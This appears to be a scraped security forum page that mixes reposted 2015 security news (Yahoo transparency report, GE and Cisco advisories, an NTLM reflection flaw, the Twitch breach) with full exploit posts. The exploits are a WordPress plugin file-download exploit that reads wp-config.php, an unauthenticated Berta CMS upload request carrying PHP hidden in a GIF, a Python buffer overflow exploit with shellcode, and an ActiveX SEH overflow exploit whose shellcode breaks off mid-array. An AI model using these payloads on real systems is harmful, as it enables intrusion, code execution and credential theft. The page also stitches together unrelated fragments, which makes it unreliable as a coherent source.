Aerosol

Yahoo received nearly 5,000 requests for user data from the United States government in the last six months of 2014 and disclosed some content in nearly 25 percent of those cases. The company said in its new transparency report that it received between 0-999 National Security Letters from the U.S. government, too. The latest report from Yahoo on government requests covers the period of July through December of 2014 and the company reported 4,865 total requests from the U.S. during that period. Those requests covered a total of 9,752 user accounts and the company disclosed some content in 1,157 of those cases. Yahoo rejected 258 of the U.S. government’s requests and disclosed solely non-content data in 2,887 cases. Yahoo defines non-content data as “the information captured at the time of registration such as an alternate e-mail address, name, location, and IP address, login details, billing information, and other transactional information”. The U.S. was by far the most active government in this report, with Taiwan coming in a distant second with 2,081 total requests. Germany sent 1,910 requests to Yahoo and the United Kingdom sent 1,570. In the previous six months, the U.S. sent 6,791 total requests to Yahoo and the company reported the same range of NSLs, 0-999. The government only allows companies to report the number of NSLs they receive in bands of 1,000. Yahoo and other technology companies have been pressuring the government for the ability to report those letters in more specific detail. In addition to the transparency data, Yahoo also provided an update on its efforts to protect users from attacks by governments and other attackers. “We’ve encrypted many of our most important products and services to protect against snooping by governments or other actors. This includes encryption of the traffic moving between Yahoo data centers; making browsing over HTTPS the default on Yahoo Mail and Yahoo Homepage; and implementing the latest in security best-practices, including supporting TLS 1.2, Perfect Forward Secrecy and a 2048-bit RSA key for many of our global properties such as Homepage, Mail and Digital Magazines. We’ve also rolled out an end-to-end (e2e) encryption extension for Yahoo Mail, now available on GitHub. Our goal is to provide an intuitive e2e encryption solution for all of our users by the end of 2015,” the company said in the report. Yahoo released the end-to-end encryption extension last week, something that was the result of an effort that Alex Stamos, the company’s CISO, announced at Black Hat last year. “Just a few years ago, e2e encryption was not widely discussed, nor widely understood. Today, our users are much more conscious of the need to stay secure online,” Stamos wrote on Yahoo’s Tumblr. He said that Yahoo’s extension will satisfy users’ needs to share sensitive information securely. “Wherever you land on the spectrum, we’ve heard you loud and clear: We’re building the best products to ensure a more secure user experience and overall digital ecosystem.” Yahoo, like its counterparts at Google, has been investing in encrypting more and more of its services and infrastructure. Much of this has come in the wake of the Edward Snowden revelations, but some of the efforts were in motion before the leaks about NSA capabilities against the companies’ services began to surface. Source

GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Application. The Frame Application must then be restarted. The Frame Application is primarily used for remote configuration. Exploitation of this vulnerability does not result in loss of information, control, or view by the control system of the HART devices on the 4-20 mA HART Loop,” the advisory says. “The buffer overflow exploited could be used to execute arbitrary code on the system running the Frame Application. The researcher has provided proof of concept to ICS-CERT and the vendor. The updated HART Device DTM provided by the GE and MACTek will resolve this issue. Successful exploitation requires that the Frame Application is running and connected to a DTM?configured HART?based device at the time of the exploit.” The new library that fixes the vulnerability is available from GE and MACTek both. The affected products are: MACTek’s Bullet DTM 1.00.0, GE’s Vector DTM 1.00.0, GE’s SVi1000 Positioner DTM 1.00.0, GE’s SVI II AP Positioner DTM 2.00.1, and GE’s 12400 Level Transmitter DTM 1.00.0. Until customers have patched their affected products, ICS-CERT recommends some additional mitigations. “Device DTM software with the identified vulnerable versions listed as impacted should be used only within an offline secure network until patched. ICS-CERT strongly recommends performing configuration changes in a nonproduction environment where proper testing and risk evaluation can be performed. ICS-CERT also recommends that asset owners employ a least privilege practice and avoid unnecessary services within their production environment,” the advisory says. Source

A default setting in both Windows 7 and 8.1 could allow local users to elevate privileges and in some situations, escape application sandboxes. The issue, something that leaves all current Windows client installations vulnerable, lies in the way the operating system handles authentication. In some instances it could be possible for a user to use a reflection attack in NT LAN Manager, a collection of security protocols found in Windows systems, to leverage WebDAV (Web Distributed Authoring and Versioning) and carry out an attack. “It’s possible to abuse cross-protocol NTLM reflection to attack the local SMB server by forcing a local system process to access a WebDAV UNC path,” warned James Forshaw, the Google Project Zero security researcher who found the issue, on Monday. Forshaw discovered the issue last year and reported it to Microsoft’s Security Response Center on Dec. 18 but the time that Project Zero gives to vendors to fix bugs – 90 days – elapsed last week, so the Google Security Research post and its proof of concept were opened to the public. According to Microsoft however the issue doesn’t merit a fix as the company has implemented mitigations for it, like Extended Protection for Authentication, in the past. According to Forshaw’s disclosure timeline, the company informed him in January that undoing the mitigations could cause “application compatibility concerns.” When reached Wednesday a Microsoft spokesperson confirmed that users should implement EPA to avoid reflection attacks using the NTLM as a vector. “Extended Protection for Authentication (EPA) is a security feature built-in to Windows 8 and 8.1, and available for older versions of Windows via knowledge base article 2345886, that helps protect our customers against this technique. We encourage customers to follow the guidance outlined in the article to enable EPA, which is off by default as it may cause some application compatibility concerns.” As EPA doesn’t come enabled by default however, Forshaw is stressing that users looking to avoid reflection attacks follow a different set of precautions, including enabling SMB signing or enabling SMB Server SPN verification. Forshaw points out that users can also disable their Webclient service, something that would make it trickier to elevate to the local system, but that this wouldn’t prevent attacks like sandbox escapes, which require user level permissions. It also might be possible to stage the exploit in another fashion, including via a DCE/RPC call. As Forshaw acknowledges in his write-up, this is far from a new issue for Microsoft – the company actually addressed a similar issue way back in 2008 (MS08-068) that could have let attackers use NTLM to mirror authentication from one machine back to the same machines. The patch disallowed NTLM sessions in flight but failed to address cross-protocol attacks like the one Project Zero found. Source

A group of technology companies, non-profits and privacy and human rights organizations have sent a letter to President Barack Obama, the director of national intelligence and a wide range of Congressional leaders, calling for an end to the bulk collection of phone metadata under Section 215 of the USA PATRIOT Act. The letter, sent by dozens of organizations and companies, comes at a time when legislators in the United States are considering a new bill that would repeal the Patriot Act altogether. That measure likely will face stiff opposition in the House of Representatives, but less-sweeping reforms may be on the table as well. In the letter, representatives from the EFF, CloudFlare, Silent Circle, the ACLU, Mozilla, Human Rights Watch and many other organizations say that whatever form the changes take, Section 215 collection needs to end once and for all. “There must be a clear, strong, and effective end to bulk collection practices under the USA PATRIOT Act, including under the Section 215 records authority and the Section 214 authority regarding pen registers and trap & trace devices. Any collection that does occur under those authorities should have appropriate safeguards in place to protect privacy and users’ rights,” the letter says. The legal authority for the National Security Agency’s bulk collection of telephone metadata derives from Section 215 of the Patriot Act, and that section is due to expire on June 1. Lawmakers are considering a variety of possible reforms to the authority, but many in the security, technology and privacy communities have been advocating for the elimination of that authority altogether. In 2014, President Obama released a plan that would change the bulk collection under Section 215 and would keep all of the records with the telecom providers. The government would then need to get orders from the Foreign Intelligence Surveillance Court in order to access specific records. In addition to calling for an end to the Section 215 bulk collection, the organizations that sent the new letter to Obama and lawmakers said that any bill must “contain transparency and accountability mechanisms for both government and company reporting, as well as an appropriate declassification regime for Foreign Intelligence Surveillance Court decisions.” The Section 215 bulk collection was the first piece of the massive surveillance revelations from Edward Snowden that began in 2013. Though many other NSA programs have been revealed in the ensuing two years, the telephone metadata collection has remained one of more controversial ones. “It has been nearly two years since the first news stories revealed the scope of the United States’ surveillance and bulk collection activities. Now is the time to take on meaningful legislative reforms to the nation’s surveillance programs that maintain national security while preserving privacy, transparency, and accountability. We strongly encourage both the White House and Members of Congress to support the above reforms and oppose any efforts to enact any legislation that does not address them,” the letter says. Source

Google is continuing to refine its Safe Browsing API and now is giving users warnings about not just malicious software on sites they’re attempting to visit, but also about unwanted software. Google’s Safe Browsing API is designed to help protect users from a variety of threats on pages across the Internet. The functionality is built into Chrome, as well as Firefox and other browsers, and when a users tries to visit a page that Google’s crawlers or other users have reported to be hosting malware, phishing links or other types of threats it will throw up a warning dialog. Depending upon the type of threat found on the target page, the browser will give the user various types of information and options. Google started showing Chrome users warnings about deceptive or unwanted software last month, but now that information will be fed into the Safe Browsing API so that other browser vendors, as well as app developers, can pull it into their offerings. “In addition to our constantly-updated malware and phishing data, our unwanted software data is now publicly available for developers to integrate into their own security measures. For example, any app that wants to save its users from winding up on sites that lead to deceptive software could use our API to do precisely that,” Emily Schechter, safe browsing program manager at Google, said in a blog post. “We continue to integrate Safe Browsing technology across Google—in Chrome, Google Analytics, and more—to protect users.” Deceptive, or unwanted, software is a fairly broad category of applications that includes things such as browser extensions that change your home page or modify the settings in your browser. These applications sometimes are bundled with other software or downloaded in the background, sometimes without a user’s knowledge. They can also include spyware or adware that collect users’ data and pretend to be something other than what they really are. Google defines deceptive software broadly as “programs disguised as a helpful download that actually make unexpected changes to your computer”. Image from Flickr photos of Parkesmj. Source

https://rstforums.com/forum/reverse-engineering-and-exploit-development.rst Si Exploit & POC's.

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-cloud-ebook-generator/ | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip | [+] Tested on: Windows,Linux | | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php | | [+] Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> | [+] http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||* Source

Berta CMS is a web based content management system using PHP and local file storage. http://www.berta.me/ Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software. We found that the file upload didn't require authentication. Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/> We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues. The author was notified: 2015-03-22 Author Acknowledge: 2015-03-23 Patch released: 2015-03-26 The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files. This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails). The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.101/upload.html Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802 Content-Length: 1617 -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="Filedata"; filename="c.php" Content-Type: text/php GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$*]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ P*s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö*a[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <*H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v 3jy'ž„šÉç£/øY …B h¤œ^ž f<‹’FP‹(n %¤¤² )›q *{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦*kÒ¥`ž‚ k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/* `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«* £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ *Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³*²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k*øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ; -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="submit" Upload Image -----------------------------2147563051636691175750543802-- Simon Waters phone +448454681066 email simon.waters@surevine.com skype simon.waters.surevine Participate | Collaborate | Innovate Surevine Limited Source

Nu l-am primit, cand il primesc o sa va anunt + poza.

@askvrit Si Marius ma cheama, majoritatea stiu asta. Cat despre "vre-o", multumesc ca m-ai corectat.

Nu am stat sa fac poza am sa postez doar raspunsul lor. Pm cine vrea sa stie unde era si alte detalii. 2x XSS si CSRF. Foarte de treaba baietii ( si fetele ) au raspuns rapid si in vreo 30 min era totul fixat.

Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code), rather than the legitimate library by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order which is a pre-defined standard on how Microsoft Windows searches for a DLL when the path has not been specified by the developer. Despite published advice on secure development practices to mitigate this threat, being available for several years, this still remains a problem today and is an ideal place for malicious code to hide and persist, as well as taking advantage of the security context of the loading program. How can DLL hijacking be detected? Okay - so it's up to the developers to be more secure in the way they load their libraries, but in the meanwhile how can we detect whether our systems have been compromised in this way? To achieve this I have been experimenting with a new methodology (well, at least it's new to me!) for detecting active attacks of this nature on vulnerable systems, and have written a program which does the following: 1. Iterate through each running process on the system, identifying all the DLLs which they have loaded 2. For each DLL, inspect all the locations where a malicious DLL could be placed 3. If a DLL with the same name appears in multiple locations in the search order, perform an analysis based on which location is currently loaded and highlight the possibility of a hijack to the user 4. Additionally: Check each DLL to see whether it has been digitally signed, and give the user the option to ignore all signed DLLs During testing I have found that DLL hijacking isn't always malicious, infact there are a whole bunch of digitally signed libraries which sit in the base directory of an application (perhaps they act differently to their generic counterparts?). Accordingly, in order to reduce the amount of noise returned by the tool, I implemented the '/unsigned' parameter, which I would recommend you use the first time you run it. This ignores cases where both the DLL which has actually been loaded, and others found in the search order are all signed (and therefore, more likely to be legit) - if you want to dig deep, feel free to leave this off! By default, the tool will only display the results where the library being examined was loaded from one of the 'DLL search order' paths, as otherwise it implies it was safely loaded from an alternative location. Unfortunately, this excludes the 'Current Working Directory' (due to a lack of an API to retrieve this data and undocumented internal memory structure changes between versions). If you want to override this you can, with the /verbose option (realistically, in conjunction with /unsigned to reduce the noise). This would be useful if you are looking for 'remote system, current working directory' style attacks as this displays entries with multiple potential DLLs irrespective of where it was loaded from. Demonstration of tool in action To test the tool, I created a vulnerable executable which does a single action: LoadLibrary(L"dll_hijack_test_dll.dll");. This sits alongside the associated DLL which, on being loaded, writes a message to the screen and sleeps forever to keep the program running. I put the DLL in two locations on the system: The path to the executable The Windows System directory (C:\Windows\System32) This now represents a common DLL hijacking attack in which the attacker would place the malicious DLL in the directory the program is launched from, which would be searched before the Windows System directory (where in this case, the legitimate DLL would be). Image 1. The demo program running with the DLL loaded The image above shows the demo running and the properties page from Process Hacker, which shows the DLL as being loaded. At this point we run dll_hijack_detect.exe, which produces the following result: Image 2. Output from dll_hijack_detect.exe on demo system Video demonstration As we can see, it has successfully identified the hijack and informed the user! Sound great! Where can I download a copy? I have release the source code and binaries, all of which are available from my github. In addition you will find a copy of the dll_hijack_test executable and DLL, so you can try it out for yourself! Source

A modular incident response framework in Powershell. Note there's a bug that's currently cropping up in PowerShell version 2 systems, but version 3 and later should be fine. More info: trustedsignal -- blog: Kansa PowerShell Magazine » Kansa: A PowerShell-based incident response framework What does it do? It uses Powershell Remoting to run user contributed, ahem, user contri- buted modules across hosts in an enterprise to collect data for use during incident response, breach hunts, or for building an environmental baseline. How do you use it? Here's a very simple command line example you can run on your own local host. After downloading the project and unzipping it, you'll likely need to "unblock" the ps1 files. The easiest way to do this if you're using Powershell v3 or later is to cd to the directory where Kansa resides and do: ls -r *.ps1 | Unblock-File If you're not running PS v3 or later, Sysinternal's Streams utility can be used to remove the alternate data streams that Powershell uses to determine if files came from the Internet. Once you've removed those ADSes, you'll be able to run the scripts without issue. I've not run into any issues running the downloaded scripts via Windows Remote Management / Powershell Remoting through Kansa, so you shouldn't have to do anything if you want to run the scripts via remoting. Open an elevated Powershell Prompt (Right-click Run As Administrator) At the command prompt, enter: .\kansa.ps1 -Target localhost -ModulePath .\Modules -Verbose The script should start collecting data or you may see an error about not having Windows Remote Management enabled. If so, do a little searching online, it's easy to turn on. Turn it on and try again. When it finishes running, you'll have a new Output_timestamp subdirectory, with subdirectories for data collected by each module. You can cd into those subdirectories and checkout the data. There are some analysis scripts in the Analysis directory, but many of those won't make sense on a collection of data from a single host. Kansa was written for collection and analysis of data from dozens, hundreds, thousands, tens of thousands of systems. Running Modules Standalone Kansa modules can be run as standalone utilities outside of the Kansa framework. Why might you want to do this? Consider netstat -naob, the output of the command line utility is ugly and doesn't easily lend itself to analysis. Running Modules\Net\Get-Netstat.ps1 as a standalone script will call netstat -naob, but it will return Powershell objects in an easy to read, easy to analyze format. You can easily convert its output to CSV, TSV or XML using normal Powershell cmdlets. Here's an example: .\Get-Netstat.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation | % { $_ -replace "`"" } | Set-Content netstat.tsv the result of the above will be a file called netstat.tsv containing unquoted, tab separate values for netstat -naob's ouput. Caveats: Powershell relies on the Windows API. Your adversary may use subterfuge.* Collectors can be written to bypass the Windows API as well. Get-RekallPslist.ps1 for example. Link: https://github.com/davehull/Kansa

Cisco's turned up vulnerabilities in automation software that open the door to denial-of-service and limited access to devices. The company's Autonomic Network Infrastructure (ANI) feature in IOS provides self-management for various IPv6-supporting routers and Ethernet switches. One of the ANI features is to remove the need for pre-staging in network bootstrap, allowing devices join a network on start, so they can be configured over the network rather than through a local port. The three vulnerabilities exploit this in various ways: Registration authority spoofing (CVE-2015-0635) – insufficient validation of the Autonomic Networking (AN) response message allows an attacker to spoof the message, either bootstrapping a device into an untrusted domain (with limited control over it), DoS-ing the device, and disrupting the victim's domain; DoS using spoofed messages (CVE-2015-0636) – In IOS and IOS XE software, a spoofed “overloaded AN” message resets the state machine; Device reload (CVE-2015-0637) – received AN messages are insufficiently validated, allowing an attacker to trigger system reloads using crafted messages. Devices running Cisco IOS and IOS XE, with ANI enabled, are vulnerable. Cisco has released patches for the vulnerable systems listed in its advisory, here. Source

Amazon has patched dangerous cross-site scripting (XSS) vulnerability in its website that exposed accounts to hijacking. A Brazilian hacker using the handle @bruteLogic published the then-zero-day flaw to XSSposed.org Saturday without tipping off the book giant. Amazon swatted the flaws two days later. The time between disclosure and patch opened what the hacker told Beta News was a chance for Amazon accounts to be compromised and web browsers exploited. His reasoning for full disclosure was that Amazon did not pay cash for bug bounty reports. He says the vulnerability allowed attacks to view Amazon user credit cards and to purchase items in their name, provided a victim clicked on a crafted malicious link. Amazon has been contacted for comment. Cross-site scripting vulnerabilities are a persistent scourge on internet assets. It allows attackers to quietly target victims using vulnerable web applications that do not properly check input. The Open Web Application Security Project puts XSS as the third worst application security blunder behind broken authentication and injection. The web hole follows Amazon's September kerfuffle after it reintroduced a flaw in its Kindle management page that could have allowed attackers to inject malcode into a book's title which could have commandeered accounts. Source

To protect its 100 million users, the live-stream video service for gamers says it has reset all passwords and disconnected user accounts from Twitter and YouTube. Twitch, which enables gamers to live-stream their game play, has likely been hacked. Twitch, which is owned by Amazon, said in a blog post Monday that it discovered possible "unauthorized access to some Twitch user account information." The company provided few details but did say that all user passwords have been reset and that accounts connected to Twitter and YouTube to promote live streams have been disconnected. According to the Wall Street Journal, which obtained a copy of an e-mail that Twitch sent to affected users, Twitch said that passwords, e-mail addresses, user names, home addresses, phone numbers, and dates of birth may have been accessed. The company has not outright confirmed a breach, saying that it's still investigating. Amazon bought Twitch last year for $970 million. Twitch is the most popular social video platform for gamers, allowing them to live stream game content and communicate with friends and fans. In February, Twitch boasted that its community now has more than 100 million members and 1.5 million broadcasters. In February 2014, Twitch accounted for 1.8 percent of all US Internet traffic at peak times, putting it behind Netflix, Google, and Apple, which combined account for more than 58 percent share. Meanwhile, Hulu, Facebook, and Amazon, among others, trailed Twitch. If Twitch was hacked, it would be just the latest in a string of attacks on major companies over the past few years. In December 2013, retail giant Target said that hackers stole credit card data for more than 110 million customers. Major hacks reported in 2014 and 2015 include those on department store Neiman Marcus, restaurant chain P.F. Chang's, crafts-supplies chain Michaels Stores, hardware chain Home Depot, office-supplies chain Staples and insurance provider Anthem. One of the most notable breaches last year hit Sony Pictures. The hackers released private e-mails of Sony executives, as well as screenings of upcoming films. The Twitch hack may have centered on simply getting data. By accessing the data, hackers could use it in a range of phishing attacks designed to target people through their e-mail addresses and get them to click on links to steal sensitive information. Attacks have also resulted in hackers selling user data on the Web's black market, allowing criminals to steal goods with another person's identity. "Gaming sites have always been a lucrative target," ESET security specialist Mark James said Tuesday. "Not only do they represent gamers that may use the same login and passwords as similar sites but they also enable the possibility of other electronic goods to be stolen and sold elsewhere, in game items, in game gold." Twitch said it plans to provide more details about the incident. Meanwhile, the company has urged its users to use strong passwords. James agreed. "There's no perfect advice for when your details are stolen but changing your password is certainly one of the best," James said. "The very best is to strengthen the importance of having unique passwords for each and every login you have - that way if your password is found it's useless on another site." Twitch did not immediately respond to CNET's request for comment. Source

A new report prepared by the United States Department of Justice’s internal watchdog has revealed that two major federal law enforcement agencies have spent millions of dollars on 23 drones that for some reason, are not operational. The report, which was published on Wednesday by the DOJ’s Office of the Inspector General, also concludes that the FBI is the “only DOJ component that operationally deploys its own UAS,” using the government acronym for Unmanned Aerial System, or drone. The DOJ OIG report comes less than three months after the Department of Homeland Security OIG concluded that after eight years, the drone program run by Customs and Border Protection was ineffective. The DOJ report also includes a few other new details, including confirmation of the 2013 assertion by then-FBI Director Robert Mueller that the agency uses drones “very seldom.” The DOJ OIG found that the FBI has only used its drones for 13 cases between 2004 and 2013. When it did fly those missions, however, the agency also determined that it apparently did not need a warrant to conduct aerial surveillance. As was first noted by Emptywheel, a government and national security blog, the DOJ OIG report also states that the FBI spent $3 million on 34 drones “and associated control stations.” But for some reason, only half of those drones are considered operational, suggesting that half of the money has effectively been wasted. Another problem is that the FBI apparently only has two drone pilots at the moment, who have to be physically shuttled around the country when a drone operation is in use. Worse still, it has been hard to train more, as the report states: Drones join the Navy? The second largest agency within the DOJ to use drones was the Bureau of Alcohol, Tobacco and Firearms, which spent a total of $600,000 on six drones and related equipment, but they too were “unsuitable" for unspecified reasons. As the DOJ OIG notes: Apparently just a week after the ATF gave up its six drones, it then went out and bought five more for $15,000. Then after realizing it needed a Certificate of Authorization from the Federal Aviation Administration in order to fly them, they were grounded. Source

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # http://www.exploit-db.com/exploits/8628/ #POC: #IMG1: #http://i.imgur.com/87sXIj8.png from struct import pack file="crack.ram" junk="\x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #http://www.exploit-db.com/exploits/28996/ shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close() Source

<html> <!-- # Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day) # Date: 26th MArch, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: 1, 6, 42, 0 # Tested on: Windows XP SP3 (IE6/7/8) # CVE : 2015-2097 targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll" prototype = "Sub LoadImage ( ByVal bstrFullPath As String )" memberName = "LoadImage" progid = "WESPMONITORLib.WESPMonitorCtrl" argCount = 1 For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html --> <object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object> <script> var arg1 = ""; nops = ""; var buff = ""; for(i=0;i<268;i++) { arg1 += "B"; } nseh = "\xeb\x10\x90\x90"; //jmp over addr seh = "\x71\x47\x01\x10"; //pop pop ret addr document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>"); for(i=0;i<200;i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + 